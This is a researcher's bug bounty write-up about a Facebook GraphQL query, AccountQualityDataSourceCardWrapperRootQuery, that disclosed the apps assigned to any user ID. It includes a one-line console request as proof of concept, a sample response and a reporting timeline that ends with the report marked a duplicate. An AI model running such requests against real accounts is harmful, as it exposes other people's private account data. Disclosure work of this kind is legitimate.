Disclose assigned apps of any facebook user

There is a GraphQL query named AccountQualityDataSourceCardWrapperRootQuery that fetches the data sources of any facebook business account by taking the value of “assetOwnerId” as business account id. At the time of reporting, call for business account id was secured but was vulnerable for the user id.

Based on the given input for the targeted facebook user, it was possible to disclose all the assigned data sources of that user.

Proof of concept

Send the GraphQL requests as an AJAX call in the console window.

AccountQualityDataSourceCardWrapperRootQuery:

new AsyncRequest('api/graphql/').setData({doc_id:8009820932425164,variables:'{"assetOwnerId":"FBID"}'}).send()

Response:

{"data":{"dataSources":[{"data_source_id":"AppID","data_source_name":"App_Name","asset_type":"APP","is_unavailable":false,"violations":[]}]},"extensions":{"is_final":true}}

Impact

This could have let a malicious user to disclose all the assigned apps of any facebook user.

Timeline

• 18 Jan, 20123 — Report Sent to Facebook.
• 19 Jan, 2023 — Triaged.
• 3 Feb 2023 — Duplicate.

Thanks for reading my write-up 🤗 Happy Hacking 🎭️

Thanks & best regards,
Gtm Mänôz

Linkedin: https://linkedin.com/in/gtm0x01

Twitter: https://www.twitter.com/gtm0x01/

Facebook: https://www.facebook.com/gtm0x01

Instagram: https://www.instagram.com/gtm0x01/